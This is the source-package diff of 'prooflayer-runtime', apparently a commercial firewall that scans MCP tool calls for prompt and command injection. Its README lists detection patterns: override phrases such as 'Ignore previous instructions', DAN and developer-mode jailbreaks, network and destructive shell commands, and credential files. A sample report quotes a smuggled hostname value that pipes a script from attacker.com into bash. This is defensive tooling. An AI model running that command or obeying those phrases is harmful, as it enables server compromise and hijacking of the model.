prooflayer-runtime 0.1.0__tar.gz

prooflayer_runtime-0.1.0/LICENSE

@@ -0,0 +1,4 @@
+Copyright (c) 2026 Sinewave AI. All rights reserved.
+
+This software is proprietary and confidential. Unauthorized copying, distribution,
+modification, or use of this software, in whole or in part, is strictly prohibited.

prooflayer_runtime-0.1.0/PKG-INFO

@@ -0,0 +1,266 @@
+Metadata-Version: 2.4
+Name: prooflayer-runtime
+Version: 0.1.0
+Summary: Runtime prompt injection firewall for MCP servers
+Home-page: https://www.proof-layer.com
+Author: Sinewave AI
+Author-email: divya@sinewave.ai
+License: Proprietary
+Project-URL: GitHub, https://github.com/sinewaveai/prooflayer-runtime
+Project-URL: Issues, https://github.com/sinewaveai/agent-security-scanner-mcp/issues
+Keywords: mcp security runtime firewall prompt-injection suse kubernetes
+Classifier: Development Status :: 3 - Alpha
+Classifier: Intended Audience :: Developers
+Classifier: License :: Other/Proprietary License
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.10
+Classifier: Programming Language :: Python :: 3.11
+Classifier: Programming Language :: Python :: 3.12
+Classifier: Topic :: Security
+Classifier: Topic :: Software Development :: Libraries :: Python Modules
+Requires-Python: >=3.10
+Description-Content-Type: text/markdown
+License-File: LICENSE
+Requires-Dist: pyyaml>=6.0.0
+Requires-Dist: httpx>=0.27.0
+Provides-Extra: mcp
+Requires-Dist: mcp>=1.0.0; extra == "mcp"
+Provides-Extra: dev
+Requires-Dist: pytest>=7.0.0; extra == "dev"
+Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
+Requires-Dist: pytest-timeout>=2.0.0; extra == "dev"
+Requires-Dist: pytest-asyncio>=0.21.0; extra == "dev"
+Requires-Dist: black>=23.0.0; extra == "dev"
+Requires-Dist: mypy>=1.0.0; extra == "dev"
+Dynamic: author
+Dynamic: author-email
+Dynamic: classifier
+Dynamic: description
+Dynamic: description-content-type
+Dynamic: home-page
+Dynamic: keywords
+Dynamic: license
+Dynamic: license-file
+Dynamic: project-url
+Dynamic: provides-extra
+Dynamic: requires-dist
+Dynamic: requires-python
+Dynamic: summary
+
+# ProofLayer Runtime Security
+
+**Runtime prompt injection firewall for MCP servers**
+
+Built for SUSE Multi-Linux Manager, NeuVector integration, and enterprise Kubernetes deployments.
+
+## Overview
+
+ProofLayer Runtime Security wraps MCP (Model Context Protocol) servers with real-time threat detection. When a prompt injection or command injection attack is detected, ProofLayer can:
+
+- **ALLOW** — Log and allow (risk score 0-29)
+- **WARN** — Log with warning (risk score 30-69)
+- **BLOCK** — Block the tool call (risk score 70-89)
+- **KILL** — Terminate the MCP server (risk score 90-100)
+
+## Features
+
+✅ **45 Detection Rules** across 4 YAML categories, plus inline heuristics
+✅ **Low Latency** detection per tool call
+✅ **JSON + SARIF Reports** for compliance
+✅ **Minimal Dependencies** (PyYAML only)
+✅ **MCP-Native** (not a proxy)
+✅ **Server Kill** on critical threats
+
+## Quick Start
+
+### Installation
+
+```bash
+# From this directory
+pip install -e .
+
+# Or copy the prooflayer/ directory to your project
+cp -r prooflayer/ /path/to/your/project/
+```
+
+### Basic Usage
+
+```python
+from prooflayer import ProofLayerRuntime
+
+# Wrap your MCP server
+runtime = ProofLayerRuntime(
+    action_on_threat="warn",  # or "block", "kill"
+    report_dir="./security-reports"
+)
+
+protected_server = runtime.wrap(mcp_server)
+protected_server.run()
+```
+
+### Example
+
+```python
+# examples/basic/simple_wrapped_server.py
+python3 examples/basic/simple_wrapped_server.py
+```
+
+## Detection Rules
+
+### Command Injection (15 rules)
+- Shell metacharacters (`;`, `|`, `&&`, `||`)
+- Dangerous commands (`curl`, `wget`, `bash`, `nc`)
+- Command substitution (backticks, `$()`)
+- Destructive commands (`rm -rf`)
+
+### Prompt Injection (12 rules)
+- "Ignore previous instructions"
+- "Disregard system prompt"
+- "New instructions"
+- System override attempts
+
+### Jailbreaks (8 rules)
+- DAN (Do Anything Now) mode
+- Developer mode activation
+- Role manipulation ("act as")
+- Alignment override
+
+### Data Exfiltration (10 rules)
+- File access (`/etc/passwd`, `.ssh/`, `.env`)
+- Base64 encoding
+- Network exfiltration
+- Sensitive file patterns
+
+*Additional inline heuristics cover role manipulation and tool poisoning patterns as fallbacks.*
+
+## Configuration
+
+Create `prooflayer.yaml`:
+
+```yaml
+detection:
+  enabled: true
+  rules_dir: ./prooflayer/rules
+  score_threshold:
+    allow: [0, 29]
+    warn: [30, 69]
+    block: [70, 100]
+
+response:
+  on_threat: warn  # allow, warn, block, kill
+  report_dir: ./security-reports
+  alert_webhook: null
+
+performance:
+  max_latency_ms: 10
+  cache_rules: true
+
+logging:
+  level: INFO
+  format: json
+```
+
+Then load it:
+
+```python
+runtime = ProofLayerRuntime(config_path="prooflayer.yaml")
+```
+
+## Attack Scenarios
+
+Test the detection engine with attack scenarios:
+
+```bash
+# Command injection
+python3 examples/attack-scenarios/01_command_injection.py
+
+# Data exfiltration
+python3 examples/attack-scenarios/02_data_exfiltration.py
+
+# Jailbreak attempts
+python3 examples/attack-scenarios/03_jailbreak.py
+```
+
+## Security Reports
+
+Reports are written to `./security-reports/` in JSON format:
+
+```json
+{
+  "prooflayer_version": "0.1.0",
+  "timestamp": "2026-02-25T10:30:45.123Z",
+  "threat": {
+    "type": "command_injection",
+    "tool": "add_system",
+    "arguments": {
+      "hostname": "prod-db; curl http://attacker.com/shell.sh | bash"
+    },
+    "risk_score": 95,
+    "action": "SERVER_KILLED"
+  },
+  "detection": {
+    "rules_matched": [
+      "cmd-inject-semicolon",
+      "cmd-inject-curl",
+      "cmd-inject-pipe"
+    ],
+    "confidence": "HIGH"
+  }
+}
+```
+
+## SUSE Integration
+
+See `examples/suse/` for integration with SUSE Multi-Linux Manager:
+
+- `wrapped-simple-mcp.py` — ProofLayer-wrapped simple-mcp
+- `systemd/prooflayer-mcp@.service` — systemd service file
+- `config/prooflayer.yaml` — SUSE-specific configuration
+
+## Architecture
+
+```
+┌─────────────────────────────────┐
+│  LLM (Claude, GPT-4, etc.)      │
+└────────────┬────────────────────┘
+             │ MCP Protocol
+             ▼
+┌─────────────────────────────────┐
+│  ProofLayer Runtime Interceptor │
+│  ├─ Scan Parameters (45 rules)  │
+│  ├─ Score Risk (0-100)          │
+│  └─ ALLOW/WARN/BLOCK/KILL       │
+└────────────┬────────────────────┘
+             │ (if ALLOW)
+             ▼
+┌─────────────────────────────────┐
+│  MCP Server (Multi-Linux Mgr)   │
+│  ├─ add_system()                │
+│  ├─ get_unscheduled_errata()    │
+│  └─ apply_patch()               │
+└─────────────────────────────────┘
+```
+
+## Performance
+
+- **Detection latency**: Low latency per tool call (benchmarks pending)
+- **Memory usage**: ~50MB
+- **Throughput**: Benchmarks pending
+
+## License
+
+Proprietary License — see [LICENSE](LICENSE) file for details. Copyright © 2026 Sinewave AI
+
+## Links
+
+- **GitHub**: https://github.com/sinewaveai/prooflayer-runtime (coming soon)
+- **Website**: https://www.proof-layer.com
+- **Issues**: https://github.com/sinewaveai/agent-security-scanner-mcp/issues
+
+## Contributing
+
+See `docs/CONTRIBUTING.md` for guidelines.
+
+---
+
+**Built for SUSE · Powered by ProofLayer**

prooflayer_runtime-0.1.0/README.md

@@ -0,0 +1,217 @@
+# ProofLayer Runtime Security
+
+**Runtime prompt injection firewall for MCP servers**
+
+Built for SUSE Multi-Linux Manager, NeuVector integration, and enterprise Kubernetes deployments.
+
+## Overview
+
+ProofLayer Runtime Security wraps MCP (Model Context Protocol) servers with real-time threat detection. When a prompt injection or command injection attack is detected, ProofLayer can:
+
+- **ALLOW** — Log and allow (risk score 0-29)
+- **WARN** — Log with warning (risk score 30-69)
+- **BLOCK** — Block the tool call (risk score 70-89)
+- **KILL** — Terminate the MCP server (risk score 90-100)
+
+## Features
+
+✅ **45 Detection Rules** across 4 YAML categories, plus inline heuristics
+✅ **Low Latency** detection per tool call
+✅ **JSON + SARIF Reports** for compliance
+✅ **Minimal Dependencies** (PyYAML only)
+✅ **MCP-Native** (not a proxy)
+✅ **Server Kill** on critical threats
+
+## Quick Start
+
+### Installation
+
+```bash
+# From this directory
+pip install -e .
+
+# Or copy the prooflayer/ directory to your project
+cp -r prooflayer/ /path/to/your/project/
+```
+
+### Basic Usage
+
+```python
+from prooflayer import ProofLayerRuntime
+
+# Wrap your MCP server
+runtime = ProofLayerRuntime(
+    action_on_threat="warn",  # or "block", "kill"
+    report_dir="./security-reports"
+)
+
+protected_server = runtime.wrap(mcp_server)
+protected_server.run()
+```
+
+### Example
+
+```python
+# examples/basic/simple_wrapped_server.py
+python3 examples/basic/simple_wrapped_server.py
+```
+
+## Detection Rules
+
+### Command Injection (15 rules)
+- Shell metacharacters (`;`, `|`, `&&`, `||`)
+- Dangerous commands (`curl`, `wget`, `bash`, `nc`)
+- Command substitution (backticks, `$()`)
+- Destructive commands (`rm -rf`)
+
+### Prompt Injection (12 rules)
+- "Ignore previous instructions"
+- "Disregard system prompt"
+- "New instructions"
+- System override attempts
+
+### Jailbreaks (8 rules)
+- DAN (Do Anything Now) mode
+- Developer mode activation
+- Role manipulation ("act as")
+- Alignment override
+
+### Data Exfiltration (10 rules)
+- File access (`/etc/passwd`, `.ssh/`, `.env`)
+- Base64 encoding
+- Network exfiltration
+- Sensitive file patterns
+
+*Additional inline heuristics cover role manipulation and tool poisoning patterns as fallbacks.*
+
+## Configuration
+
+Create `prooflayer.yaml`:
+
+```yaml
+detection:
+  enabled: true
+  rules_dir: ./prooflayer/rules
+  score_threshold:
+    allow: [0, 29]
+    warn: [30, 69]
+    block: [70, 100]
+
+response:
+  on_threat: warn  # allow, warn, block, kill
+  report_dir: ./security-reports
+  alert_webhook: null
+
+performance:
+  max_latency_ms: 10
+  cache_rules: true
+
+logging:
+  level: INFO
+  format: json
+```
+
+Then load it:
+
+```python
+runtime = ProofLayerRuntime(config_path="prooflayer.yaml")
+```
+
+## Attack Scenarios
+
+Test the detection engine with attack scenarios:
+
+```bash
+# Command injection
+python3 examples/attack-scenarios/01_command_injection.py
+
+# Data exfiltration
+python3 examples/attack-scenarios/02_data_exfiltration.py
+
+# Jailbreak attempts
+python3 examples/attack-scenarios/03_jailbreak.py
+```
+
+## Security Reports
+
+Reports are written to `./security-reports/` in JSON format:
+
+```json
+{
+  "prooflayer_version": "0.1.0",
+  "timestamp": "2026-02-25T10:30:45.123Z",
+  "threat": {
+    "type": "command_injection",
+    "tool": "add_system",
+    "arguments": {
+      "hostname": "prod-db; curl http://attacker.com/shell.sh | bash"
+    },
+    "risk_score": 95,
+    "action": "SERVER_KILLED"
+  },
+  "detection": {
+    "rules_matched": [
+      "cmd-inject-semicolon",
+      "cmd-inject-curl",
+      "cmd-inject-pipe"
+    ],
+    "confidence": "HIGH"
+  }
+}
+```
+
+## SUSE Integration
+
+See `examples/suse/` for integration with SUSE Multi-Linux Manager:
+
+- `wrapped-simple-mcp.py` — ProofLayer-wrapped simple-mcp
+- `systemd/prooflayer-mcp@.service` — systemd service file
+- `config/prooflayer.yaml` — SUSE-specific configuration
+
+## Architecture
+
+```
+┌─────────────────────────────────┐
+│  LLM (Claude, GPT-4, etc.)      │
+└────────────┬────────────────────┘
+             │ MCP Protocol
+             ▼
+┌─────────────────────────────────┐
+│  ProofLayer Runtime Interceptor │
+│  ├─ Scan Parameters (45 rules)  │
+│  ├─ Score Risk (0-100)          │
+│  └─ ALLOW/WARN/BLOCK/KILL       │
+└────────────┬────────────────────┘
+             │ (if ALLOW)
+             ▼
+┌─────────────────────────────────┐
+│  MCP Server (Multi-Linux Mgr)   │
+│  ├─ add_system()                │
+│  ├─ get_unscheduled_errata()    │
+│  └─ apply_patch()               │
+└─────────────────────────────────┘
+```
+
+## Performance
+
+- **Detection latency**: Low latency per tool call (benchmarks pending)
+- **Memory usage**: ~50MB
+- **Throughput**: Benchmarks pending
+
+## License
+
+Proprietary License — see [LICENSE](LICENSE) file for details. Copyright © 2026 Sinewave AI
+
+## Links
+
+- **GitHub**: https://github.com/sinewaveai/prooflayer-runtime (coming soon)
+- **Website**: https://www.proof-layer.com
+- **Issues**: https://github.com/sinewaveai/agent-security-scanner-mcp/issues
+
+## Contributing
+
+See `docs/CONTRIBUTING.md` for guidelines.
+
+---
+
+**Built for SUSE · Powered by ProofLayer**

prooflayer_runtime-0.1.0/prooflayer/__init__.py

@@ -0,0 +1,50 @@
+"""
+ProofLayer Runtime Security
+============================
+
+Runtime prompt injection firewall for MCP servers.
+Detects malicious prompts, kills compromised servers, generates security reports.
+
+Built for SUSE Multi-Linux Manager and enterprise Kubernetes deployments.
+"""
+
+from .runtime.wrapper import ProofLayerRuntime
+from .detection.engine import DetectionEngine
+from .detection.models import ScanResult, DetectionRule
+from .detection.scanner import PatternScanner
+from .detection.scorer import RiskScorer
+from .detection.semantic import SemanticAnalyzer
+from .response.actions import ThreatAction, ResponseAction
+from .response.killer import ServerKiller
+from .runtime.interceptor import MCPInterceptor
+from .runtime.middleware import ProofLayerMiddleware
+
+__version__ = "0.1.0"
+__author__ = "Sinewave AI"
+__license__ = "MIT"
+
+__all__ = [
+    "ProofLayerRuntime",
+    "DetectionEngine",
+    "DetectionRule",
+    "ScanResult",
+    "PatternScanner",
+    "RiskScorer",
+    "SemanticAnalyzer",
+    "ThreatAction",
+    "ResponseAction",
+    "ServerKiller",
+    "MCPInterceptor",
+    "ProofLayerMiddleware",
+]
+
+
+# Lazy imports for optional dependencies
+def __getattr__(name):
+    if name == "ProofLayerMCPWrapper":
+        from .runtime.mcp_wrapper import ProofLayerMCPWrapper
+        return ProofLayerMCPWrapper
+    if name == "ProofLayerTransportProxy":
+        from .runtime.transport import ProofLayerTransportProxy
+        return ProofLayerTransportProxy
+    raise AttributeError(f"module {__name__!r} has no attribute {name!r}")